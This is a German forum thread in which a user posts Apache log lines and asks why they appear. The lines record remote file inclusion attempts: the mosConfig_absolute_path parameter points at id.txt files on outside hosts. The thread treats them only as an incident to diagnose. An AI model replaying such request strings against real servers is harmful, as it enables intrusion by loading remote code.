Apache logs

Dieses Thema im Forum "Web- & File-Services" wurde erstellt von DivDax, 04.02.2009.

  1. DivDax

    DivDax Grünschnabel

    Dabei seit:
    15.05.2008
    Beiträge:
    8
    Zustimmungen:
    0
    Hallo zusammen!

    Ich habe folgendes in meiner apache.log gefunden, was mich etwas beunruhigt:
    Code:
    127.0.0.1 - - [29/Jan/2009:00:29:52 +0100] "GET /?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://lout.nl/id.txt%3f HTTP/1.1" 200 -
    127.0.0.1 - - [29/Jan/2009:04:28:02 +0100] "GET /?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.artsflanders.be/id.txt%3f HTTP/1.1" 200 -
    127.0.0.1 - - [29/Jan/2009:04:31:52 +0100] "GET /?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.artsflanders.be/id.txt%3f HTTP/1.1" 200 -
    127.0.0.1 - - [29/Jan/2009:05:31:23 +0100] "GET /?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.artsflanders.be/id.txt%3f HTTP/1.1" 200 -
    Kann mir jemand sagen was da vor sich geht?
    Wer zum teufel surft lokal etwas an? Und wo?

    Bitte helft mir auf die Sprünge.


    Vielen Dank!

    Gruß,
    DivDax
     
  2. Anzeige

    Schau dir mal diese Kategorie an. Dort findest du bestimmt etwas.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  3. mcas

    mcas Routinier

    Dabei seit:
    29.12.2005
    Beiträge:
    398
    Zustimmungen:
    0
    Was läuft auf dem Webserver, eine eigene Webanwendung oder was "fertiges"? Hast du die Meldungen schon länger? Hört der Apache nur auf localhost?
     
  4. DivDax

    DivDax Grünschnabel

    Dabei seit:
    15.05.2008
    Beiträge:
    8
    Zustimmungen:
    0
    Auf dem Server laufen mehrere Projekte und ist dementsprechend über mehrere Domains erreichbar.
    Ich hatte solche Logs vor etwa zwei Wochen schon mal. Allerdings wurden pro Sekunde etwa 50 Aufrufe dieser Art gestartet.

    Für mich sieht das so aus, als ob der Server selbst auf etwas zugreift. Er bekommt auch ein HTTP 200 OK zurück. ?(
     
  5. marce

    marce Kaiser

    Dabei seit:
    01.08.2007
    Beiträge:
    1.053
    Zustimmungen:
    8
  6. Anzeige

    Vielleicht findest du HIER Antworten.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
Thema:

Apache logs

Die Seite wird geladen...

Apache logs - Ähnliche Themen

  1. Server Config, Apache2, SSHd und Logs?!

    Server Config, Apache2, SSHd und Logs?!: Moin Männers... Ich sitze gerade auf der Arbeit und gucke mir so die httpd-conf von unserem Server hier im Büro an der nur intern verfügbar steht...
  2. Apache Remote-Logging und Runtime-Parsing der Logs

    Apache Remote-Logging und Runtime-Parsing der Logs: Hi, ich versuche mich gerade am Remote-Logging für Apache, wobei ich allerdings ein paar Anforderungen habe, die von den normalen...
  3. Apache Logs zeigen Zeitverschiebungen

    Apache Logs zeigen Zeitverschiebungen: Moin, mein Apache Server reagiert seit kurzem teilweise nicht mehr, kurz vor einem Ausfall kann ich folgendes in den Logs erkennen:...
  4. Update auf Apache >=2.4.12 unter Debian Jessie

    Update auf Apache >=2.4.12 unter Debian Jessie: Hi, aufgrund eines Bugs in Apache 2.4 benötige ich zum Deployment von Seafile unter Debian Jessie das Paket apache2 in der Version >= 2.4.12...
  5. Centos und Apache (VirtualHost)

    Centos und Apache (VirtualHost): Hallo, ich bin gerade dabei die Firmenseiten unserer Unternehmensgruppe neu zu gestalten. Insgesammt sind es 3 Unternehmen. Als Server wurde mir...